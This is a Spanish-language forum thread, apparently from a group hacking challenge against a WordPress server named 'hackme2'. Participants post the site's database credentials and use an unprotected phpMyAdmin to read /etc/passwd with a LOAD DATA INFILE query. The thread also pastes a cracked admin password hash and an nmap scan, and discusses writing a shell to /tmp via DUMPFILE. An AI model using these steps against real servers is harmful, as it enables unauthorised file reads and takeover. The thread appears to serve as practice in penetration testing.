Se..

<?php
// ** MySQL settings ** //
define('DB_NAME', 'hackme2');    // The name of th...
define('DB_USER', 'root');     // Your MySQL usern...
define('DB_PASSWORD', ''); // ...and password
define('DB_HOST', 'localhost');    // 99% chance y...
 
// You can have multiple installations in one data...
$table_prefix  = 'wp_';   // Only numbers, letters...
 
// Change this to localize WordPress.  A correspon...
// chosen language must be installed to wp-include...
// For example, install de.mo to wp-includes/langu...
// to enable German language support.
define ('WPLANG', '');
 
/* That's all, stop editing! Happy blogging. */
 
define('ABSPATH', dirname(__FILE__).'/');
require_once(ABSPATH.'wp-settings.php');
?>

Saludos

El ID es 1, hay usuarios del 1 al 7. WHK, el tienes el PHPMyADMIN desprotegido para lanzar cualquier SQL xD, el wp-config.php

db_user = 'root';
db_password = '';
db_name = 'hackme2';
db_prefix = 'wp_';

Saludos

Perdon xD

Bueno, tenemos acceso a PHPMyAdmin como root, tenemos todos los privilegios, esto lo podemos ver usando la pestaña Users de PHPMyAdmin.

root    127.0.0.1    No    ALL PRIVILEGES    Yes

Sabiendo esto, sabemos que tenemos acceso a funciones como LOAD DATA o DUMPFILE.

Por tanto, podemos crear una tabla, y usar LOAD DATA para ver el contenido de ficheros a los que tenemos acceso.

LOAD DATA INFILE '/etc/passwd' INTO TABLE BaseDeDatos.tabla;

PD: @xustyx has mirado el directorio de webmin ? Yo es que no lo encuentro por ninguna parte xD

PD2: He vuelto a poner la contraseña original del usuario admin de WP (aclaro que no fui yo el que la cambio).  Para quitaros trabajo inútil:
 a7c85c1a6114797d06425195899a8abe = 2bc11f

PD3: El directorio de webmin es /usr/share/webmin

Saludos

Buenas


Algo de progreso...

/etc/passwd - sin contraseñas

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/s...
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:103:106::/home/syslog:/bin/false
klog:x:104:107::/home/klog:/bin/false
bind:x:105:109::/var/cache/bind:/bin/false
smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
smmsp:x:107:111:Mail Submission Program,,,:/var/li...
landscape:x:108:112::/var/lib/landscape:/bin/false
mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos

Es que lo mas gracioso de todo es que la carpeta /uploads no existe xD

http://host.net/wp-content/uploads/

Saludos

el WP parece vulnerable por todos lados pero dado que no tiene permisos ni para editarse a si mismo, es un poco inutil intentar subir algo por ahi..

Via el PHPMyAdmin se puede subir mediante dumpfile al directorio /tmp .. si solo pudieramos encontrar un LFI, la shell estaria subida.

Saludos

 → nmap -sV  ###########
 
Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-01 16:07 CEST
Nmap scan report for #########  (#########)
Host is up (0.18s latency).
rDNS record for ######: #######
Not shown: 995 closed ports
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          (protocol 2.0)
53/tcp    open     domain
80/tcp    open     http         Apache httpd 2.4.6 ((Ubuntu))
445/tcp   filtered microsoft-ds
10000/tcp open     http         MiniServ 1.690 (Webmin httpd)

Saludos

pffffffffff...

Fui yo por hacer la gracia xD No he rooteado ni nada, fue inyeccion de HTML en uno de los post..

Saludos

El puerto 22 es ssh .. el rsa2 key es el handshake para cifrado.

Saludos

Pues las tipica donde se suben archivos de wordpress

' /var/www/wp-content/uploads/ ' -> 404 Ese no existe (wordpress no tiene permisos para crearlo)
' /var/www/wp-content/themes/ ' -> Index list
' /var/www/wp-content/plugins/ ' -> Index list


PD: Si lo intentas por dumpfile en PHPMyAdmin.. olvidalo, mysqld no tiene permiso para la carpeta /var/www .. solo he conseguido subir en /tmp.. pero haria falta un LFI para llegar hasta ahi.

Saludos